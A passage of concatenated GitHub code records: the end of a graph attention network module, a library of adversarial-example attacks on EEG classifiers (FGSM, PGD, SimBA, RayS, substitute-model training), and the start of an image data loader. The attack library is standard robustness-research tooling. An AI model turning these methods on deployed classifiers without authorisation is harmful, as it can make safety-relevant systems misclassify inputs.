graph.in_degrees().float().clamp(min=1)\n # norm = torch.pow(degs, -0.5)\n norm = torch.pow(degs, 0.5)\n shp = norm.shape + (1,) * (feat_dst.dim() - 1)\n norm = torch.reshape(norm, shp)\n rst = rst * norm\n\n return rst\n\n\nclass LEGATLayer(nn.Module):\n def __init__(self, in_size: int, out_size: int, etypes: list, ntypes: list, num_heads: int = 8, residual: bool = False, feat_drop: float = 0.0,\n output_drop: float = 0.0, use_attn_dst: bool = True, norm: bool = True, full_batch: bool = True, use_symmetric_norm: bool = False):\n \"\"\"\n :param in_size: input feature dimension\n :param out_size: output feature dimension\n :param etypes: list of relation types\n :param ntypes: list of node types\n :param num_heads: number of attention heads\n :param residual: Boolean, whether to consider self information\n :param feat_drop: Feature dropout probability\n :param output_drop: Output dropout probability\n :param use_attn_dst: whether calculate attention for destination node\n :param norm: Boolean, whether normalization\n :param full_batch: Whether to train in a full-batch manner\n :param use_symmetric_norm: whether use use symmetric norm\n \"\"\"\n\n super(LEGATLayer, self).__init__()\n\n self.in_size = in_size\n self.out_size = out_size\n self.etypes = etypes\n self.ntypes = ntypes\n self.num_heads = num_heads\n self.residual = residual\n self.feat_drop = feat_drop\n self.norm = norm\n self.full_batch = full_batch\n self.output_dropout = nn.Dropout(output_drop)\n\n self.src_node_transformation = nn.ModuleDict({\n ntype: nn.Linear(in_size, out_size * num_heads, bias=False) for ntype in ntypes\n })\n\n self.dst_node_transformation = nn.ModuleDict({\n ntype: nn.Linear(in_size, out_size * num_heads, bias=False) for ntype in ntypes\n })\n\n self.src_node_attention = nn.ParameterDict({\n ntype: nn.Parameter(torch.FloatTensor(size=(1, num_heads, out_size))) for ntype in ntypes\n })\n\n self.dst_node_attention = nn.ParameterDict({\n ntype: nn.Parameter(torch.FloatTensor(size=(1, num_heads, out_size))) for ntype in ntypes\n })\n\n if self.residual:\n # residual connection\n self.res_fc = nn.ModuleDict({\n ntype: nn.Linear(in_size, out_size * num_heads, bias=False) for ntype in ntypes\n })\n\n if self.norm:\n self.normalization = nn.ModuleDict({\n ntype: nn.BatchNorm1d(out_size * num_heads) for ntype in ntypes\n })\n\n self.hetero_conv = HeteroGraphConv({\n etype: GATConv(in_feats=in_size, out_feats=out_size, num_heads=num_heads, feat_drop=feat_drop,\n use_attn_dst=use_attn_dst, use_symmetric_norm=use_symmetric_norm) for etype in etypes\n })\n\n self.reset_parameters()\n\n def reset_parameters(self):\n \"\"\"\n Reinitialize learnable parameters.\n \"\"\"\n gain = nn.init.calculate_gain('relu')\n for ntype in self.src_node_transformation:\n nn.init.xavier_normal_(self.src_node_transformation[ntype].weight, gain=gain)\n for ntype in self.dst_node_transformation:\n nn.init.xavier_normal_(self.dst_node_transformation[ntype].weight, gain=gain)\n for weight in self.src_node_attention:\n nn.init.xavier_normal_(self.src_node_attention[weight], gain=gain)\n for weight in self.dst_node_attention:\n nn.init.xavier_normal_(self.dst_node_attention[weight], gain=gain)\n if self.residual:\n for ntype in self.res_fc:\n nn.init.xavier_uniform_(self.res_fc[ntype].weight, gain=gain)\n\n def forward(self, graph: dgl.DGLGraph, node_features: dict):\n \"\"\"\n :param graph: a graph\n :param node_features: tensor, Input features, (N, in_size)\n :return: (N, num_heads * out_size)\n \"\"\"\n # dictionary of input source features and destination features\n input_src = node_features\n\n if self.full_batch:\n input_dst = node_features\n else:\n input_dst = {}\n for ntype in node_features:\n input_dst[ntype] = node_features[ntype][:graph.number_of_dst_nodes(ntype)]\n\n output_features = self.hetero_conv(graph, input_src, input_dst, self.src_node_transformation, self.dst_node_transformation,\n self.src_node_attention, self.dst_node_attention)\n\n if self.residual:\n for ntype in output_features:\n output_features[ntype] = output_features[ntype] + self.res_fc[ntype](input_dst[ntype])\n\n if self.norm:\n for ntype in output_features:\n output_features[ntype] = self.normalization[ntype](output_features[ntype])\n\n for ntype in output_features:\n output_features[ntype] = self.output_dropout(F.relu(output_features[ntype]))\n\n # Tensor, shape (N, out_size * num_heads)\n return output_features\n\n\nclass LEGAT(nn.Module):\n def __init__(self, input_dim_dict: dict, hidden_sizes: list, etypes: list, ntypes: list, num_heads: int = 8, residual: bool = False, input_drop: float = 0.0,\n feat_drop: float = 0.0, output_drop: float = 0.0, use_attn_dst: bool = True, norm: bool = True, use_symmetric_norm: bool = False, full_batch: bool = True):\n \"\"\"\n :param input_dim_dict: dict, input dim dictionary\n :param hidden_sizes: list, hidden feature dimension of each layer\n :param etypes: list of relation types\n :param ntypes: list of node types\n :param num_heads: int, number of attention heads\n :param residual: Boolean, whether to consider self information\n :param input_drop: Input dropout probability\n :param feat_drop: Feature dropout probability\n :param output_drop: Dropout probability\n :param use_attn_dst: whether calculate attention for destination node\n :param norm: Boolean, whether normalization\n :param full_batch: Whether to train in a full-batch manner\n :param use_symmetric_norm: whether use use symmetric norm\n \"\"\"\n\n super(LEGAT, self).__init__()\n\n self.input_dim_dict = input_dim_dict\n self.hidden_sizes = hidden_sizes\n self.etypes = etypes\n self.ntypes = ntypes\n self.num_heads = num_heads\n self.residual = residual\n self.feat_drop = feat_drop\n self.output_drop = output_drop\n self.norm = norm\n self.full_batch = full_batch\n\n self.input_dropout = nn.Dropout(input_drop)\n\n # align the dimension of different types of nodes\n self.projection_layer = nn.ModuleDict({\n ntype: nn.Linear(input_dim_dict[ntype], hidden_sizes[0] * num_heads, bias=False) for ntype in input_dim_dict\n })\n\n # each layer takes in the heterogeneous graph as input\n self.layers = nn.ModuleList()\n self.layers.append(LEGATLayer(hidden_sizes[0] * num_heads, hidden_sizes[0], etypes=etypes, ntypes=ntypes, num_heads=num_heads, residual=residual,\n feat_drop=feat_drop, output_drop=output_drop, use_attn_dst=use_attn_dst, norm=norm, full_batch=full_batch, use_symmetric_norm=use_symmetric_norm))\n\n for l in range(1, len(hidden_sizes)):\n self.layers.append(LEGATLayer(hidden_sizes[l-1] * num_heads, hidden_sizes[l], etypes=etypes, ntypes=ntypes, num_heads=num_heads, residual=residual,\n feat_drop=feat_drop, output_drop=output_drop, use_attn_dst=use_attn_dst, norm=norm, full_batch=full_batch, use_symmetric_norm=use_symmetric_norm))\n\n def forward(self, blocks: list or dgl.DGLHeteroGraph, node_features: dict):\n \"\"\"\n :param blocks: list of sampled dgl.DGLHeteroGraph\n :param node_features: node features, dict, {\"type\": features}\n :return:\n \"\"\"\n # feature projection\n for ntype in node_features:\n node_features[ntype] = self.projection_layer[ntype](self.input_dropout(node_features[ntype]))\n\n if self.full_batch:\n for layer in self.layers:\n node_features = layer(blocks, node_features)\n else:\n for block, layer in zip(blocks, self.layers):\n node_features = layer(block, node_features)\n\n return node_features\n\n def inference(self, graph: dgl.DGLHeteroGraph, node_features: dict, device: str):\n \"\"\"\n mini-batch inference of final representation over all node types. Outer loop: Interate the layers, Inner loop: Interate the batches\n\n :param graph: The whole relational graphs\n :param node_features: features of all the nodes in the whole graph, dict, {\"type\": features}\n :param device: device str\n \"\"\"\n with torch.no_grad():\n # interate over each layer\n for index, layer in enumerate(self.layers):\n # Tensor, features of all types of nodes, store on cpu\n y = {\n ntype: torch.zeros(\n graph.number_of_nodes(ntype), self.num_heads * self.hidden_sizes[index]) for ntype in graph.ntypes\n }\n # full sample for each type of nodes\n sampler = dgl.dataloading.MultiLayerFullNeighborSampler(1)\n dataloader = dgl.dataloading.NodeDataLoader(\n graph,\n {ntype: torch.arange(graph.number_of_nodes(ntype)) for ntype in graph.ntypes},\n sampler,\n batch_size=1280,\n shuffle=True,\n drop_last=False,\n num_workers=4)\n\n tqdm_dataloader = tqdm(dataloader, ncols=120)\n for batch, (input_nodes, output_nodes, blocks) in enumerate(tqdm_dataloader):\n block = blocks[0].to(device)\n\n input_features = {ntype: node_features[ntype][input_nodes[ntype]].to(device) for ntype in input_nodes.keys()}\n\n if index == 0:\n # input drop and feature projection for the first layer in the full batch inference\n for ntype in input_features:\n input_features[ntype] = self.projection_layer[ntype](self.input_dropout(input_features[ntype]))\n\n h = layer(block, input_features)\n\n for k in h.keys():\n y[k][output_nodes[k]] = h[k].cpu()\n\n tqdm_dataloader.set_description(f'inference for the {batch}-th batch in model {index}-th layer')\n\n # update the features of all the nodes (after the graph convolution) in the whole graph\n node_features = y\n\n return y\n","repo_name":"yule-BUAA/LEGNN","sub_path":"model/LEGNN.py","file_name":"LEGNN.py","file_ext":"py","file_size_in_byte":17055,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"28803108633","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nfrom typing import Optional\nfrom model import EEGNet\nfrom utils.pytorch_utils import init_weights, CenterLoss\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom utils.ot import sinkhorn_loss_joint_IPOT\n\n\ndef FGSM(model: nn.Module,\n x: torch.Tensor,\n y: torch.Tensor,\n eps: Optional[float] = 0.05,\n distance: Optional[str] = 'inf',\n target: Optional[bool] = False):\n \"\"\" FGSM attack \"\"\"\n device = next(model.parameters()).device\n criterion = nn.CrossEntropyLoss().to(device)\n\n data_loader = DataLoader(dataset=TensorDataset(x, y),\n batch_size=128,\n shuffle=False,\n num_workers=1,\n drop_last=False)\n\n model.eval()\n for step, (batch_x, batch_y) in enumerate(data_loader):\n batch_x = batch_x.clone().detach().to(device)\n batch_y = batch_y.clone().detach().to(device)\n batch_x.requires_grad = True\n\n with torch.enable_grad():\n loss = criterion(model(batch_x), batch_y)\n grad = torch.autograd.grad(loss,\n batch_x,\n retain_graph=False,\n create_graph=False)[0]\n\n if distance == 'inf':\n delta = grad.detach().sign()\n elif distance == 'l2':\n grad_norms = torch.norm(\n grad.detach().view(len(batch_x), -1), p=2, dim=1) + 1e-10\n # factor = torch.min(eps / grad_norms, torch.ones_like(grad_norms))\n delta = grad.detach() / grad_norms.view(-1, 1, 1, 1)\n else:\n raise 'No such distance.'\n\n if target:\n batch_adv_x = batch_x.detach() - eps * delta\n else:\n batch_adv_x = batch_x.detach() + eps * delta\n\n if step == 0: adv_x = batch_adv_x\n else: adv_x = torch.cat([adv_x, batch_adv_x], dim=0)\n\n return adv_x\n\n\ndef PGD(model: nn.Module,\n x: torch.Tensor,\n y: torch.Tensor,\n eps: Optional[float] = 0.05,\n alpha: Optional[float] = 0.005,\n steps: Optional[int] = 20,\n distance: Optional[str] = 'inf',\n target: Optional[bool] = False):\n \"\"\" PGD attack \"\"\"\n device = next(model.parameters()).device\n criterion = nn.CrossEntropyLoss().to(device)\n\n data_loader = DataLoader(dataset=TensorDataset(x, y),\n batch_size=128,\n shuffle=False,\n drop_last=False)\n\n model.eval()\n for step, (batch_x, batch_y) in enumerate(data_loader):\n batch_x = batch_x.clone().detach().to(device)\n batch_y = batch_y.clone().detach().to(device)\n\n # craft adversarial examples\n batch_adv_x = batch_x.clone().detach() + torch.empty_like(\n batch_x).uniform_(-eps, eps)\n for _ in range(steps):\n batch_adv_x.requires_grad = True\n with torch.enable_grad():\n loss = criterion(model(batch_adv_x), batch_y)\n grad = torch.autograd.grad(loss,\n batch_adv_x,\n retain_graph=False,\n create_graph=False)[0]\n\n if distance == 'inf':\n delta = grad.detach().sign()\n elif distance == 'l2':\n grad_norms = torch.norm(\n grad.detach().view(len(batch_x), -1), p=2, dim=1) + 1e-10\n delta = grad.detach() / grad_norms.view(-1, 1, 1, 1)\n else:\n raise 'No such distance'\n\n if target:\n batch_adv_x = batch_adv_x.detach() - alpha * delta\n else:\n batch_adv_x = batch_adv_x.detach() + alpha * delta\n\n # projection\n if distance == 'inf':\n delta = torch.clamp(batch_adv_x - batch_x, min=-eps, max=eps)\n else:\n delta = batch_adv_x - batch_x\n delta_norms = torch.norm(delta.view(len(batch_x), -1),\n p=2,\n dim=1)\n factor = torch.min(eps / delta_norms,\n torch.ones_like(delta_norms))\n delta = delta * factor.view(-1, 1, 1, 1)\n\n batch_adv_x = (batch_x + delta).detach()\n\n if step == 0: adv_x = batch_adv_x\n else: adv_x = torch.cat([adv_x, batch_adv_x], dim=0)\n\n return adv_x\n\n\ndef PGD_batch(model: nn.Module,\n x: torch.Tensor,\n y: torch.Tensor,\n eps: Optional[float] = 0.05,\n alpha: Optional[float] = 0.005,\n steps: Optional[int] = 20):\n \"\"\" PGD attack \"\"\"\n device = next(model.parameters()).device\n criterion = nn.CrossEntropyLoss().to(device)\n\n model.eval()\n x = x.clone().detach().to(device)\n y = y.clone().detach().to(device)\n\n # craft adversarial examples\n adv_x = x.clone().detach() + torch.empty_like(x).uniform_(-eps, eps)\n for _ in range(steps):\n adv_x.requires_grad = True\n with torch.enable_grad():\n loss = criterion(model(adv_x), y)\n grad = torch.autograd.grad(loss,\n adv_x,\n retain_graph=False,\n create_graph=False)[0]\n adv_x = adv_x.detach() + alpha * grad.detach().sign()\n # projection\n delta = torch.clamp(adv_x - x, min=-eps, max=eps)\n adv_x = (x + delta).detach()\n\n return adv_x\n\n\ndef maximize_shift_inconsistency(model: nn.Module,\n batch_adv_x: torch.Tensor,\n x: torch.Tensor,\n y: torch.Tensor,\n criterion: nn.Module,\n eps: Optional[float] = 0.05,\n alpha: Optional[float] = 0.005,\n steps: Optional[int] = 20):\n device = next(model.parameters()).device\n\n model.eval()\n batch_adv_x = batch_adv_x.clone().detach().to(device)\n x = x.clone().detach().to(device)\n y = y.clone().detach().to(device)\n for _ in range(steps):\n batch_adv_x.requires_grad = True\n with torch.enable_grad():\n loss = criterion(model(batch_adv_x) - model(x), y)\n grad = torch.autograd.grad(loss,\n batch_adv_x,\n retain_graph=False,\n create_graph=False)[0]\n batch_adv_x = batch_adv_x.detach() + 0.4 * alpha * grad.detach().sign()\n # projection\n delta = torch.clamp(batch_adv_x - x, min=-eps, max=eps)\n batch_adv_x = (x + delta).detach()\n \n return batch_adv_x\n\n\ndef feature_scatter(model: nn.Module,\n x: torch.Tensor,\n y: torch.Tensor,\n eps: Optional[float] = 0.05,\n alpha: Optional[float] = 0.005,\n steps: Optional[int] = 20):\n device = next(model.parameters()).device\n\n model.eval()\n x = x.clone().detach().to(device)\n y = y.clone().detach().to(device)\n\n logits = model(x)\n m, n = len(x), len(x)\n\n # craft adversarial examples\n adv_x = x.clone().detach() + torch.empty_like(x).uniform_(-eps, eps)\n for _ in range(steps):\n adv_x.requires_grad = True\n adv_logits = model(adv_x)\n with torch.enable_grad():\n loss = sinkhorn_loss_joint_IPOT(1, 0.00, logits,\n adv_logits, None, None,\n 0.01, m, n)\n grad = torch.autograd.grad(loss,\n adv_x,\n retain_graph=False,\n create_graph=False)[0]\n adv_x = adv_x.detach() + alpha * grad.detach().sign()\n # projection\n delta = torch.clamp(adv_x - x, min=-eps, max=eps)\n adv_x = (x + delta).detach()\n \n return adv_x\n\n\ndef get_preds(model: nn.Module, x: torch.Tensor):\n logits = model(x)\n preds = nn.Softmax(dim=1)(logits).argmax(dim=1)\n return preds\n\n\ndef get_probs(model: nn.Module, x: torch.Tensor, y: torch.Tensor):\n logits = model(x)\n probs = torch.index_select(nn.Softmax(dim=1)(logits),\n dim=1,\n index=y.squeeze())\n return torch.diag(probs)\n\n\ndef SimBA(model: nn.Module,\n x: torch.Tensor,\n y: torch.Tensor,\n max_iters: Optional[float] = 0.5,\n eps=0.05,\n distance='inf',\n target=False):\n \"\"\" simple black attack \"\"\"\n device = next(model.parameters()).device\n\n if distance == 'inf': alpha = eps\n else: alpha = 0.05\n\n data_loader = DataLoader(dataset=TensorDataset(x, y),\n batch_size=128,\n shuffle=False,\n num_workers=1,\n drop_last=False)\n\n for step, (batch_x, batch_y) in enumerate(data_loader):\n batch_x = batch_x.clone().detach().to(device)\n batch_y = batch_y.clone().detach().to(device)\n\n shape = batch_x.shape\n n_dims = shape[-2] * shape[-1]\n iters = int(max_iters * n_dims)\n\n perm_idx_list = torch.randperm(n_dims)[:iters].to(device)\n perm = torch.zeros(shape[0], n_dims).to(device)\n queries = torch.zeros(shape[0]).to(device)\n remaining_idx = torch.arange(0, shape[0]).to(device)\n\n batch_x = batch_x.reshape(shape[0], -1)\n\n with torch.no_grad():\n preds = get_preds(model, batch_x.reshape(shape))\n probs = get_probs(model, batch_x.reshape(shape), batch_y)\n\n for i in tqdm(range(iters)):\n perm_idx = perm_idx_list[i]\n perm_x = batch_x[remaining_idx] + perm[remaining_idx]\n preds[remaining_idx] = get_preds(\n model, perm_x.reshape((len(perm_x), *shape[1:])))\n\n if target:\n remaining = ~preds.eq(batch_y.view_as(preds))\n else:\n remaining = preds.eq(batch_y.view_as(preds))\n\n # if all inputs are misclassified\n if remaining.sum() == 0: break\n\n remaining_idx = torch.arange(0, shape[0]).to(device)\n remaining_idx = remaining_idx[remaining]\n one_step_perm = torch.zeros(remaining.sum(), n_dims).to(device)\n one_step_perm[:, perm_idx] = alpha\n # training negative direction\n perm[remaining_idx] -= one_step_perm\n perm_x = batch_x[remaining_idx] + perm[remaining_idx]\n new_probs = get_probs(\n model,\n perm_x.reshape((len(perm_x), *shape[1:])).to(device),\n batch_y[remaining_idx])\n queries[remaining_idx] += 1\n effective = new_probs.lt(probs[remaining_idx])\n # perturb on positive direction if not effective\n if target:\n perm[remaining_idx[\n effective]] += 2 * one_step_perm[effective]\n perm_x[effective] += 2 * one_step_perm[effective]\n else:\n perm[remaining_idx[\n ~effective]] += 2 * one_step_perm[~effective]\n perm_x[~effective] += 2 * one_step_perm[~effective]\n # update probs\n probs[remaining_idx] = get_probs(\n model,\n perm_x.reshape((len(perm_x), *shape[1:])).to(device),\n batch_y[remaining_idx])\n\n if distance == 'l2':\n perm_norms = torch.norm(perm.view(len(perm), -1), p=2, dim=1) + 1e-10\n perm = (perm / perm_norms.view(-1, 1)) * eps\n\n batch_adv_x = (batch_x + perm).reshape(shape)\n\n if step == 0: adv_x = batch_adv_x\n else: adv_x = torch.cat([adv_x, batch_adv_x], dim=0)\n\n return adv_x.cpu(), queries.cpu()\n\n\ndef get_pred(model: nn.Module, x: torch.Tensor):\n device = next(model.parameters()).device\n pred_x = torch.ones(size=(len(x), 1)).squeeze().type(torch.LongTensor)\n train_loader = DataLoader(dataset=TensorDataset(x, pred_x),\n batch_size=32,\n shuffle=False,\n num_workers=1,\n drop_last=False)\n\n idx = 0\n for batch_x, _ in train_loader:\n sub_pred = model(batch_x.to(device))\n sub_pred = nn.Softmax(dim=1)(sub_pred).cpu().argmax(dim=1)\n pred_x[idx:idx + len(sub_pred)] = sub_pred.type(torch.LongTensor)\n idx += len(sub_pred)\n\n return pred_x\n\n\ndef TrainSub(model: nn.Module, x_sub: torch.Tensor, y_sub: torch.Tensor,\n aug_repeat: int):\n device = next(model.parameters()).device\n sub_model = EEGNet(n_classes=len(np.unique(y_sub.numpy())),\n Chans=x_sub.shape[2],\n Samples=x_sub.shape[3],\n kernLenght=64,\n F1=4,\n D=2,\n F2=8,\n dropoutRate=0.25).to(device)\n sub_model.apply(init_weights)\n\n params = [v for _, v in sub_model.named_parameters()]\n optimizer = optim.Adam(params, lr=0.001, weight_decay=5e-4)\n criterion = nn.CrossEntropyLoss().to(device)\n\n # initial dataset\n model.eval()\n y_sub = get_pred(model, x_sub)\n\n for r in range(aug_repeat):\n train_loader = DataLoader(dataset=TensorDataset(x_sub, y_sub),\n batch_size=32,\n shuffle=True,\n num_workers=1,\n drop_last=False)\n for epoch in range(100):\n sub_model.train()\n for step, (batch_x, batch_y) in enumerate(train_loader):\n batch_x, batch_y = batch_x.to(device), batch_y.to(device)\n optimizer.zero_grad()\n logit = sub_model(batch_x)\n loss = criterion(logit, batch_y)\n loss.backward()\n optimizer.step()\n sub_model.MaxNormConstraint()\n\n # 样本 augment\n if r < aug_repeat - 1:\n adv_x = FGSM(sub_model, x_sub, y_sub, eps=0.05)\n adv_y = get_pred(model, adv_x.cpu())\n x_sub = torch.cat([x_sub, adv_x.cpu()], dim=0)\n y_sub = torch.cat([y_sub, adv_y.type(torch.LongTensor)], dim=0)\n del adv_x, adv_y\n\n return sub_model\n\n\nclass RayS(object):\n def __init__(self, model, epsilon=0.031, order=np.inf):\n self.model = model\n self.ord = order\n self.epsilon = epsilon\n self.sgn_t = None\n self.d_t = None\n self.x_final = None\n self.queries = None\n self.device = next(model.parameters()).device\n\n def get_xadv(self, x, v, d, lb=0., ub=1.):\n if isinstance(d, int):\n d = torch.tensor(d).repeat(len(x)).to(self.device)\n out = x + d.view(len(x), 1, 1, 1) * v\n out = torch.clamp(out, lb, ub)\n return out\n\n def attack_hard_label(self, x, y, target=None, query_limit=10000, seed=None):\n \"\"\" Attack the original image and return adversarial example\n model: (pytorch model)\n (x, y): original image\n \"\"\"\n shape = list(x.shape)\n dim = np.prod(shape[1:])\n lb, ub = x.min(), x.max()\n if seed is not None:\n np.random.seed(seed)\n\n # init variables\n self.queries = torch.zeros_like(y).to(self.device)\n self.sgn_t = torch.sign(torch.ones(shape)).to(self.device)\n self.d_t = torch.ones_like(y).float().fill_(float(\"Inf\")).to(self.device)\n working_ind = (self.d_t > self.epsilon).nonzero().flatten()\n\n stop_queries = self.queries.clone()\n dist = self.d_t.clone()\n self.x_final = self.get_xadv(x, self.sgn_t, self.d_t, lb, ub)\n \n block_level = 0\n block_ind = 0\n for i in range(query_limit):\n block_num = 2 ** block_level\n block_size = int(np.ceil(dim / block_num))\n start, end = block_ind * block_size, min(dim, (block_ind + 1) * block_size)\n\n valid_mask = (self.queries < query_limit) \n attempt = self.sgn_t.clone().view(shape[0], dim)\n attempt[valid_mask.nonzero().flatten(), start:end] *= -1.\n attempt = attempt.view(shape)\n\n self.binary_search(x, y, target, attempt, valid_mask)\n\n block_ind += 1\n if block_ind == 2 ** block_level or end == dim:\n block_level += 1\n block_ind = 0\n\n dist = torch.norm((self.x_final - x).view(shape[0], -1), self.ord, 1)\n stop_queries[working_ind] = self.queries[working_ind]\n working_ind = (dist > self.epsilon).nonzero().flatten()\n\n if torch.sum(self.queries >= query_limit) == shape[0]:\n print('out of queries')\n break\n\n print('d_t: %.4f | adbd: %.4f | queries: %.4f | rob acc: %.4f | iter: %d'\n % (torch.mean(self.d_t), torch.mean(dist), torch.mean(self.queries.float()),\n len(working_ind) / len(x), i + 1))\n \n\n stop_queries = torch.clamp(stop_queries, 0, query_limit)\n return self.x_final, stop_queries, dist, (dist <= self.epsilon)\n \n\n def attack_batch(self, x, y, target=None, query_limit=5000, seed=None):\n data_loader = DataLoader(dataset=TensorDataset(x, target if target!=None else y),\n batch_size=1024,\n shuffle=False,\n drop_last=False)\n\n for step, (batch_x, batch_y) in enumerate(data_loader):\n batch_x = batch_x.clone().detach().to(self.device)\n batch_y = batch_y.clone().detach().to(self.device)\n\n batch_adv_x, _, _, _ = self.attack_hard_label(batch_x, batch_y, target=batch_y if target!=None else None, query_limit=query_limit)\n \n # projection\n if self.ord == np.inf:\n delta = torch.clamp(batch_adv_x - batch_x, min=-self.epsilon, max=self.epsilon)\n else:\n delta = batch_adv_x - batch_x\n delta_norms = torch.norm(delta.view(len(batch_x), -1),\n p=2,\n dim=1)\n factor = torch.min(self.epsilon / delta_norms,\n torch.ones_like(delta_norms))\n delta = delta * factor.view(-1, 1, 1, 1)\n\n batch_adv_x = (batch_x + delta).detach()\n\n if step == 0: adv_x = batch_adv_x\n else: adv_x = torch.cat([adv_x, batch_adv_x], dim=0)\n\n return adv_x.cpu()\n\n # check whether solution is found\n def search_succ(self, x, y, target, mask):\n self.queries[mask] += 1\n if target!=None:\n return self.model.predict_label(x[mask]) == target[mask]\n else:\n return self.model.predict_label(x[mask]) != y[mask]\n\n # binary search for decision boundary along sgn direction\n def binary_search(self, x, y, target, sgn, valid_mask, tol=1e-3):\n lb, ub = x.min(), x.max()\n sgn_norm = torch.norm(sgn.view(len(x), -1), 2, 1)\n sgn_unit = sgn / sgn_norm.view(len(x), 1, 1, 1)\n\n d_start = torch.zeros_like(y).float().to(self.device)\n d_end = self.d_t.clone()\n\n initial_succ_mask = self.search_succ(self.get_xadv(x, sgn_unit, self.d_t, lb, ub), y, target, valid_mask)\n to_search_ind = valid_mask.nonzero().flatten()[initial_succ_mask]\n d_end[to_search_ind] = torch.min(self.d_t, sgn_norm)[to_search_ind]\n\n while len(to_search_ind) > 0:\n d_mid = (d_start + d_end) / 2.0\n search_succ_mask = self.search_succ(self.get_xadv(x, sgn_unit, d_mid, lb, ub), y, target, to_search_ind)\n d_end[to_search_ind[search_succ_mask]] = d_mid[to_search_ind[search_succ_mask]]\n d_start[to_search_ind[~search_succ_mask]] = d_mid[to_search_ind[~search_succ_mask]]\n to_search_ind = to_search_ind[((d_end - d_start)[to_search_ind] > tol)]\n\n to_update_ind = (d_end < self.d_t).nonzero().flatten()\n if len(to_update_ind) > 0:\n self.d_t[to_update_ind] = d_end[to_update_ind]\n self.x_final[to_update_ind] = self.get_xadv(x, sgn_unit, d_end, lb, ub)[to_update_ind]\n self.sgn_t[to_update_ind] = sgn[to_update_ind]\n\n def __call__(self, data, label, target=None, query_limit=10000):\n return self.attack_hard_label(data, label, target=target, query_limit=query_limit)","repo_name":"lbinmeng/bci_adv_defense","sub_path":"attack_lib.py","file_name":"attack_lib.py","file_ext":"py","file_size_in_byte":20907,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70373575786","text":"\"\"\"\nThis module provides everything needed for data loading and pre-processing\nfor the image classification approach.\n\"\"\"\nimport logging\nimport math\nfrom typing import List, Optional, Tuple, Callable, Union\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport cv2 as cv\n\nfrom ..constants import LABEL_MAP\nfrom ..data.common import Sample\nfrom ..data.generate_tfrecord import read_tfrecord\n\nlog = logging.getLogger(__name__)\n\n\nclass JointsSequence(tf.keras.utils.Sequence):\n \"\"\"\n Implements a Keras Sequence dataset, which will allow the fit API to load\n multiple batches in parallel.\n \"\"\"\n\n def __init__(\n self,\n csv_path_or_df: Union[str, pd.DataFrame],\n split: Optional[str] = None,\n crop_width: int = 299,\n crop_height: int = 299,\n batch_size: int = 32,\n random_crop: bool = True,\n augment_data: bool = True,\n adaptive_threshold: bool = False,\n ):\n\n if isinstance(csv_path_or_df, str):\n with open(csv_path_or_df, 'r') as f:\n df = pd.read_csv(f)\n\n if split is not None:\n df = df[df['split'] == split]\n elif isinstance(csv_path_or_df, pd.DataFrame):\n df = csv_path_or_df\n else:\n raise ValueError\n\n self._df = df\n\n self._crop_width = crop_width\n self._crop_height = crop_height\n self._batch_size = batch_size\n self._random_crop = random_crop\n self._augment_data = augment_data\n self._adaptive_threshold = adaptive_threshold\n\n def __len__(self) -> int:\n return math.ceil(len(self._df) / self._batch_size)\n\n def __getitem__(self, index: int) -> Tuple[tf.Tensor, tf.Tensor]:\n\n images = []\n labels = []\n\n low = index * self._batch_size\n high = (index + 1) * self._batch_size\n for i in range(low, high if high < len(self._df) else len(self._df)):\n sample = Sample.from_dataframe(self._df.iloc[i])\n image, label = self._load_sample(sample)\n\n images.append(image)\n labels.append(label)\n\n return tf.stack(images, axis=0), tf.stack(labels)\n\n def on_epoch_end(self):\n pass\n\n def _load_sample(self, sample: Sample) -> Tuple[tf.Tensor, tf.Tensor]:\n \"\"\"\n Loads a single sample from disk.\n\n Parameters\n ----------\n sample: Sample\n Data required to load the sample.\n\n Returns\n -------\n tf.Tensor, tf.Tensor\n image and label\n \"\"\"\n image = read_image(sample.filepath, 'png', self._adaptive_threshold)\n\n image = preprocess(\n image,\n sample.bbox.to_pascal_voc(),\n self._crop_width,\n self._crop_height,\n self._random_crop,\n self._augment_data,\n )\n\n label = tf.one_hot(LABEL_MAP[sample.bbox.cls] - 1, 2)\n\n return image, label\n\n\ndef shift_lower(bndbox: List[int]) -> List[int]:\n \"\"\"\n Shift bounding box upwards, if lower bounds are negative\n (out of bounds)\n\n Parameters\n ----------\n bndbox : List[int]\n Bounding box in the shape [x0, x1, y0, y1]\n\n Returns\n -------\n Updated bounding box in the same shape as input.\n \"\"\"\n x0, x1, y0, y1 = bndbox\n # shift box in case of negative values\n x_offset_low = -tf.math.minimum(x0, tf.constant(0))\n y_offset_low = -tf.math.minimum(y0, tf.constant(0))\n\n x0 += x_offset_low\n x1 += x_offset_low\n y0 += y_offset_low\n y1 += y_offset_low\n\n return [x0, x1, y0, y1]\n\n\ndef shift_upper(bndbox: List[int], max_x: int, max_y: int) -> List[int]:\n \"\"\"\n Shift bounding box downwards, if upper bounds are beyond image edge\n (out of bounds)\n\n Parameters\n ----------\n bndbox : List[int]\n Bounding box in the shape [x0, x1, y0, y1].\n max_x : int\n Image width\n max_y : int\n Image height\n\n Returns\n -------\n Updated bounding box in the same shape as input.\n \"\"\"\n\n x0, x1, y0, y1 = bndbox\n # shift box in case of OOB values\n log.debug(f'max x: {max_x}, x1: {x1}')\n x_offset_up = tf.math.maximum(max_x, x1) - max_x\n y_offset_up = tf.math.maximum(max_y, y1) - max_y\n\n x0 -= x_offset_up\n x1 -= x_offset_up\n y0 -= y_offset_up\n y1 -= y_offset_up\n\n return [x0, x1, y0, y1]\n\n\ndef random_crop_bbox(\n image: tf.Tensor,\n bndbox: List[tf.Tensor],\n width: int = 299,\n height: int = 299,\n) -> tf.Tensor:\n \"\"\"\n Random crop an area around a bounding box to a fixed size.\n If output size is greater than maximum crop size the image will\n be zero-padded.\n\n Parameters\n ----------\n image : np.ndarray\n image array of size [height, width, 3]\n bndbox : List[int]\n Bounding box in the shape [x0, x1, y0, y1].\n width : int\n Cropped image width\n height : int\n Cropped image height\n\n Returns\n -------\n Crop of image.\n \"\"\"\n max_x, max_y = tf.shape(image)[1], tf.shape(image)[0]\n\n crop_width = bndbox[1] - bndbox[0]\n crop_height = bndbox[3] - bndbox[2]\n\n offset_x = tf.random.uniform(\n [1], 0, tf.reshape(width - 